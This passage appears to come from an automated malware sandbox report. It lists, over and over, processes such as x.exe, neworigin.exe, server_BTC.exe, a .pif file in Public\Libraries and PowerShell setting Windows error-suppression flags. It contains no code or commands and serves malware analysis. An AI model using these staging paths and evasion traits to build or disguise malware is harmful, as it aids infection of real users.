                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
